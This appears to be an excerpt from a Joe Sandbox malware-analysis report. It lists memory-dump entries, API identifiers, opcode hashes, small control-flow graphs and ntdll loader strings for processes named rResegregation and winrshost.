                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 3446177414-161242083
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                  • String ID:
                                                                  • API String ID: 4281723722-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$Flst
                                                                  • API String ID: 0-758220159
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: ^z7
                                                                  • API String ID: 3446177414-3359154134
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: 0$0
                                                                  • API String ID: 3446177414-203156872
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: z7$mz7
                                                                  • API String ID: 3446177414-454254324
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:0%
                                                                  Dynamic/Decrypted Code Coverage:96.3%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:107
                                                                  Total number of Limit Nodes:3

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 32 31134e0-31134ec LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3843e5d2a267421b08a8048b4678008742243ded7a0016b4bbc36a6d5f84d1ae
                                                                  • Instruction ID: 8e0beb934944e06cc49af581745ca9eb190da90744e457fb6ee0d52d31ecd7c4
                                                                  • Opcode Fuzzy Hash: 3843e5d2a267421b08a8048b4678008742243ded7a0016b4bbc36a6d5f84d1ae
                                                                  • Instruction Fuzzy Hash: 6090023160511803D500A1585714706140587D4201F62C815E4415568DC7A9896175B2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 23 3112b10-3112b1c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3c53702c4bdb88a1d242709bc562ebe1f75eef8aba66e87b8b47435c2d4e8c4e
                                                                  • Instruction ID: b5cd35254ce9f873b28659563e4550824763992f33d0e0e378665fd3276f561a
                                                                  • Opcode Fuzzy Hash: 3c53702c4bdb88a1d242709bc562ebe1f75eef8aba66e87b8b47435c2d4e8c4e
                                                                  • Instruction Fuzzy Hash: E890023120101C03D580B158560474A040587D5301F92C419E4016654DCB298A6977B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 22 3112b00-3112b0c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3fc83fbf44e4bf68fc993ae8dac58cb6ee5d25d3451cb12be35b9de6f3a5c775
                                                                  • Instruction ID: 46861d9781a0f193a7febd5276305e7b4567d0c6962812d88df1a2cd80c5cb66
                                                                  • Opcode Fuzzy Hash: 3fc83fbf44e4bf68fc993ae8dac58cb6ee5d25d3451cb12be35b9de6f3a5c775
                                                                  • Instruction Fuzzy Hash: 7890023120505C43D540B1585604B46041587D4305F52C415E4055694DD7398D65B671
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 25 3112b90-3112b9c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 5d5605b0030c8bb44d8992ce02348454d0450117dbf869db8463d31b8856fd93
                                                                  • Instruction ID: 9bceb7ba26f8b046f8b3f09fabab9c90cb72bb3393deafb1a8ba724e6b76fa28
                                                                  • Opcode Fuzzy Hash: 5d5605b0030c8bb44d8992ce02348454d0450117dbf869db8463d31b8856fd93
                                                                  • Instruction Fuzzy Hash: 8190023120109C03D510A158960474A040587D4301F56C815E8415658DC7A988A17131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 24 3112b80-3112b8c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6e7eeef1271d7d2edf366cc54b92876662fae5a216f5df3f8ec0da4d5ad9911e
                                                                  • Instruction ID: ffa74bc5772ceec3658f9202679ea9ee90e01b281175933b1e169870b6b41a50
                                                                  • Opcode Fuzzy Hash: 6e7eeef1271d7d2edf366cc54b92876662fae5a216f5df3f8ec0da4d5ad9911e
                                                                  • Instruction Fuzzy Hash: EF90023120101C43D500A1585604B46040587E4301F52C41AE4115654DC729C8617531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 26 3112bc0-3112bcc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e67bac5a8e8639abda1a6504a9f6f1c4fa4787eaa5264e96b2f2f3d408093d1f
                                                                  • Instruction ID: 00b335c5fdfb34938d1d1ebca5fcfb35928a8459d78d5ce45a9c23bfddb0a0e3
                                                                  • Opcode Fuzzy Hash: e67bac5a8e8639abda1a6504a9f6f1c4fa4787eaa5264e96b2f2f3d408093d1f
                                                                  • Instruction Fuzzy Hash: 7D90023120101803D500A5986608746040587E4301F52D415E9015555EC77988A17131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 21 3112a80-3112a8c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 63dfeb03b8f7841314b2d0294e1a8f8f236fff37e69eec0e62bd39cfa22a03ea
                                                                  • Instruction ID: 92c55d1a30ffdb923630b7ff9684398146927a1ef2c7d06895b09b82e828e3d1
                                                                  • Opcode Fuzzy Hash: 63dfeb03b8f7841314b2d0294e1a8f8f236fff37e69eec0e62bd39cfa22a03ea
                                                                  • Instruction Fuzzy Hash: 73900261202014034505B1585614716440A87E4201B52C425E5005590DC73988A17135
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 20 31129f0-31129fc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: f5a93b08a473a9cd26711f2c14e08a68e2793db616da07fed62012de77d1db95
                                                                  • Instruction ID: a57ab773917b801c55260f3b2a4310f4945f3e7ea067ba94424013b6f031402a
                                                                  • Opcode Fuzzy Hash: f5a93b08a473a9cd26711f2c14e08a68e2793db616da07fed62012de77d1db95
                                                                  • Instruction Fuzzy Hash: 90900435311014030505F55C17047070447C7DD351353C435F5007550CD735CC717131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 31 3112f00-3112f0c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b1e4e9680d5d4dfa0813f713e7707952d25f0bbcccb53e5e15261d26e1de75be
                                                                  • Instruction ID: 310d297a50ea9de57b5cf2e7ad80c9837e2444e1bee6b003ee7270d86a16705f
                                                                  • Opcode Fuzzy Hash: b1e4e9680d5d4dfa0813f713e7707952d25f0bbcccb53e5e15261d26e1de75be
                                                                  • Instruction Fuzzy Hash: 2390022121181443D600A5685E14B07040587D4303F52C519E4145554CCB2988716531
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 30 3112e50-3112e5c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 10eb0de816254023408e7b66553355bebc249b1f33e6107e809f5c8acb3f11c3
                                                                  • Instruction ID: 6f134f83a32fb009366853c713b39cba53ce342bafda11f102ff8a4cf9ed325d
                                                                  • Opcode Fuzzy Hash: 10eb0de816254023408e7b66553355bebc249b1f33e6107e809f5c8acb3f11c3
                                                                  • Instruction Fuzzy Hash: 6590026134101843D500A1585614B060405C7E5301F52C419E5055554DC72DCC627136
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 29 3112d10-3112d1c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 939d7d48943e017a6d56ab7e9132dd9eef5ca94170931a9ff2bf257814ffd2f8
                                                                  • Instruction ID: a5971b66aa3a8015931fe3b443ca196883fc34df619e4c027683426921e8a08c
                                                                  • Opcode Fuzzy Hash: 939d7d48943e017a6d56ab7e9132dd9eef5ca94170931a9ff2bf257814ffd2f8
                                                                  • Instruction Fuzzy Hash: A390023120101813D511A1585704707040987D4241F92C816E4415558DD76A8962B131
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 27 3112c30-3112c3c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 28 3112cf0-3112cfc LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 0 2a68bd7-2a68bd8 1 2a68bda-2a68be5 RtlFreeHeap 0->1 2 2a68bf8-2a68bfc 0->2 3 2a68be7 1->3 4 2a68bfe-2a68c05 1->4 5 2a68c4a-2a68c62 3->5 6 2a68be9-2a68bef 3->6 10 2a68c63-2a68c64 4->10 11 2a68c07-2a68c09 4->11 5->10 7 2a68ba3 6->7 8 2a68bf1-2a68bf6 6->8 12 2a68ba4-2a68ba9 7->12 8->2 13 2a68bac-2a68bb3 12->13 13->13 14 2a68bb5-2a68bcf 13->14 14->12 15 2a68bd1-2a68bd6 14->15 15->0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30432885507.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_2a40000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 16 3112b2a-3112b2f 17 3112b31-3112b38 16->17 18 3112b3f-3112b46 LdrInitializeThunk 16->18
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03144592
                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0314454D
                                                                  • ExecuteOptions, xrefs: 031444AB
                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03144530
                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03144460
                                                                  • Execute=1, xrefs: 0314451E
                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03144507
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                  • API String ID: 0-484625025
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.30433793365.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                  • Associated: 00000005.00000002.30433793365.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000005.00000002.30433793365.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_30a0000_winrshost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $$@
                                                                  • API String ID: 0-1194432280
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%